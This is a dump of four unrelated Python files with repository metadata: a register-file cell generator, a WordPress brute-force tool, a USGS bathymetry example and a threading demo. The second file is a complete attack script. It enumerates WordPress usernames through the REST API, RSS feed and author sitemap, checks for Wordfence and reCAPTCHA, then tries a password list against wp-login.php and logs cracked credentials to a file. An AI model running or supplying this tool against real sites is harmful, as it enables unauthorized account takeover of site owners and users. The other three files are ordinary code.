#takes in the output file handle, the entry number, the number of bits, the number of reads, and the width of the
#tristate buffers on the read outputs
#expects the same inputs as make_store_cell; ensure the code is valid there
#Matthew Trahms
#EE 526
#4/20/21
from make_store_cell import make_store_cell
def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num):
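	#parameter sketch (descriptive): out_file is an open file handle,
	#entry_number the row index, bits the word width, reads the read-port
	#count, buff_width the tristate buffer width; regfile_num is assumed to
	#be the register-file instance index, forwarded straight to make_store_cell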
#just need to create the correct number of bits
#this and the make_store_array are going to be pretty simple
for bit in range(bits):
make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num)
return
if __name__ == '__main__':
f = open('store_entry_test.txt', 'w')
rows = 4
cols = 2
reads = 2
for row in range(rows):
make_store_entry(f, row, cols, reads, 1, 0)
f.close()
| 31.464286 | 114 | 0.760499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 481 | 0.54597 |
fc46a91fda80741480960994acf3dbc98c9e618b | 8886 | py | Python | wordpress-brute.py | RandomRobbieBF/wordpress-bf | fe78d4367b7baaf18a4200c5c040595d37b4100f | ["MIT"] | 1 | 2020-07-27T11:30:23.000Z | 2020-07-27T11:30:23.000Z | wordpress-brute.py | RandomRobbieBF/wordpress-bf | fe78d4367b7baaf18a4200c5c040595d37b4100f | ["MIT"] | null | null | null | wordpress-brute.py | RandomRobbieBF/wordpress-bf | fe78d4367b7baaf18a4200c5c040595d37b4100f | ["MIT"] | 1 | 2020-05-17T12:40:13.000Z | 2020-05-17T12:40:13.000Z | #!/usr/bin/env python
#
# Wordpress Bruteforce Tool
#
# By @random_robbie
#
#
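# Example invocation (illustrative host and wordlist):
#   python3 wordpress-brute.py -u http://wordpress.lan -f pass.txt
#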
import requests
import json
import sys
import argparse
import re
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL")
parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File")
args = parser.parse_args()
url = args.url
passfile = args.file
http_proxy = ""
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
"ftp" : http_proxy
}
# Grab WordPress users via the WordPress JSON API
def grab_users_api(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict)
if 'rest_user_cannot_view' in response.text:
print ("[-] REST API Endpoint Requires Permissions [-]")
return False
if response.status_code == 404:
print ("[-] Rest API Endpoint returns 404 Not Found [-]")
return False
elif response.status_code == 200:
jsonstr = json.loads(response.content)
return jsonstr
# Grab Wordpress Users via Sitemap
def grab_users_sitemap(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
return response.text
# Grab Wordpress Users via RSS Feed
def grab_users_rssfeed(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
if "dc:creator" in response.text:
return response.text
# Check we can get to wp-admin login.
def check_wpadmin(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict)
if "Powered by WordPress" in response.text:
if "wp-submit" in response.text:
if "reCAPTCHA" not in response.text:
return True
else:
return False
else:
return False
else:
return False
# Check URL is wordpress
def check_is_wp(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict)
if "wp-content" in response.text:
return True
else:
return False
# Check if Wordfence is installed, as it limits logins to 20 per IP
def check_wordfence(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict)
if "Wordfence Security - Firewall & Malware Scan" in response.text:
return True
else:
return False
# Test the logins
def test_login (url,user,password,cnt,attempts):
if str(cnt) == attempts:
print("[-] Stopping as Wordfence will block your IP [-]")
sys.exit(0)
paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"}
headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"wordpress_test_cookie":"WP+Cookie+check"}
response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False)
if response.status_code == 503:
print("[-] Website is giving 503 HTTP Status [-]")
sys.exit(0)
if response.status_code == 502:
print("[-] Website is giving 502 HTTP Status [-]")
sys.exit(0)
if response.status_code == 403:
print("[-] Website is giving 403 HTTP Status - WAF Blocking[-]")
sys.exit(0)
if "Google Authenticator code" in response.text:
print("[-] 2FA is enabled Sorry [-]")
sys.exit(0)
if "wordpress_logged_in" in response.headers['Set-Cookie']:
print("[+] Found Login Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [+]")
text_file = open("found.txt", "a")
text_file.write(""+url+" Found Login Username: "+user+" Password: "+password+"\n")
text_file.close()
sys.exit(0)
else:
print("[-] Login Failed for Username: "+user+" Password: "+password+" on attempt "+str(cnt)+" [-]")
cnt += 1
return cnt
def count_pass(passfile):
count = 0
with open(passfile, 'r') as f:
for line in f:
count += 1
return str(count)
# Nobody likes dupes.
def remove_dupes():
lines_seen = set()
outfile = open("users.txt", "w")
for line in open("rssusers.txt", "r"):
if line not in lines_seen:
outfile.write(line)
lines_seen.add(line)
outfile.close()
def attack_restapi(url,attempts,userdata,passfile):
for id in userdata:
user = id['slug']
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
def attack_rssfeed(url,attempts,userdata,passfile):
users = re.compile("<dc:creator><!(.+?)]]></dc:creator").findall(userdata)
if os.path.exists("rssusers.txt"):
os.remove("rssusers.txt")
if os.path.exists("users.txt"):
os.remove("users.txt")
for user in users:
u = user.replace("[CDATA[","")
text_file = open("rssusers.txt", "a")
text_file.write(""+str(u)+"\n")
text_file.close()
remove_dupes()
with open("users.txt", 'r') as f:
for line in f:
user = line.strip()
cnt = 1
print(("[+] Found User: "+user+" [+]"))
with open(passfile, 'r') as b:
for line in b:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
def attack_sitemap(url,attempts,userdata,passfile):
auth = re.findall(r'(<loc>(.*?)</loc>)\s',userdata)
for user in auth:
thisuser = user[1]
h = thisuser.split('/')
user = h[4]
cnt = 1
with open(passfile, 'r') as f:
for line in f:
password = line.strip()
cnt = test_login (url,user,password,cnt,attempts)
# Time For Some Machine Learning Quality IF statements.
def basic_checks(url):
if check_is_wp(url):
if check_wpadmin(url):
return True
else:
return False
else:
return False
if basic_checks(url):
print("[+] Confirmed Wordpress Website [+]")
else:
print ("[-] Sorry this is either not a wordpress website or there is a issue blocking wp-admin [-]")
sys.exit(0)
if os.path.isfile(passfile) and os.access(passfile, os.R_OK):
print("[+] Password List Used: "+passfile+" [+]")
else:
print("[-] Either the file is missing or not readable [-]")
sys.exit(0)
# Tracks which method will be used to enumerate users
method = "None"
attempts = "None"
# Which method to use for enumeration
if grab_users_api(url):
print("[+] Users found via Rest API [-]")
method = "restapi"
if grab_users_rssfeed(url) and method == "None":
print("[+] Users found via RSS Feed [+]")
method = "rss"
if grab_users_sitemap(url) and method == "None":
print("[+] Users found via Authors Sitemap [-]")
method = "sitemap"
if method == "None":
print ("[-] Oh Shit it seems I was unable to find a method to grab usernames from [-]")
sys.exit(0)
if check_wordfence(url):
print ("[+] Wordfence is installed this will limit the testing to 20 attempts [+]")
attempts = "20"
# Kick off Parsing and attacking
if method == "restapi":
userdata = grab_users_api(url)
attack_restapi(url,attempts,userdata,passfile)
if method == "rss":
userdata = grab_users_rssfeed(url)
attack_rssfeed(url,attempts,userdata,passfile)
if method == "sitemap":
userdata = grab_users_sitemap(url)
attack_sitemap(url,attempts,userdata,passfile)
| 31.399293 | 388 | 0.679721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,616 | 0.406932 |
fc519cd073372b79ff5e315d6c117f1de77e8ef5 | 602 | py | Python | examples/bathymetricGradient.py | usgs/water-datapreptools | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | ["CC0-1.0"] | 2 | 2021-06-22T18:18:47.000Z | 2021-09-25T18:16:26.000Z | examples/bathymetricGradient.py | usgs/water-datapreptools | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | ["CC0-1.0"] | null | null | null | examples/bathymetricGradient.py | usgs/water-datapreptools | 49c852a0c189e142a351331ba6e0d1ef9e7a408b | ["CC0-1.0"] | null | null | null | import sys
sys.path.append("..")  # make the parent directory importable so the tools can be found
from make_hydrodem import bathymetricGradient
workspace = r"" # path to geodatabase to use as a workspace
snapGrid = r"" # path to snapping grid
hucPoly = r"" # path to local folder polygon
hydrographyArea = r"" # path to NHD area feature class
hydrographyFlowline = r"" # path to NHD flowline feature class
hydrographyWaterbody = r"" # path to NHD water body feature class
cellsize = '' # cell size
bathymetricGradient(workspace, snapGrid, hucPoly, hydrographyArea,
hydrographyFlowline, hydrographyWaterbody,cellsize) | 43 | 67 | 0.757475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 278 | 0.461794 |
fc5346e19911a49d8686625f457f771311d07483 | 324 | py | Python | Codes/gracekoo/test.py | ghoslation/algorithm | 5708bf89e59a80cd0f50f2e6138f069b4f9bc96e | ["Apache-2.0"] | 256 | 2017-10-25T13:02:15.000Z | 2022-02-25T13:47:59.000Z | Codes/gracekoo/test.py | IYoreI/Algorithm | 0addf0cda0ec9e3f46c480eeda3a8ecb64c94121 | ["Apache-2.0"] | 56 | 2017-10-27T01:34:20.000Z | 2022-03-01T00:20:55.000Z | Codes/gracekoo/test.py | IYoreI/Algorithm | 0addf0cda0ec9e3f46c480eeda3a8ecb64c94121 | ["Apache-2.0"] | 83 | 2017-10-25T12:51:53.000Z | 2022-02-15T08:27:03.000Z | # -*- coding: utf-8 -*-
# @Time: 2020/11/8 23:47
# @Author: GraceKoo
# @File: test.py
# @Desc:
from threading import Thread
import time
def print_numbers():
time.sleep(0.2)
print("子线程结束")
if __name__ == "__main__":
t1 = Thread(target=print_numbers)
    t1.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute
t1.start()
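    # Note: because t1 is a daemon thread and the main thread returns right
    # after start(), the interpreter usually exits before the 0.2 s sleep
    # finishes, so "child thread finished" is typically never printed.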
# print("主线程结束")
| 16.2 | 37 | 0.623457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 143 | 0.415698 |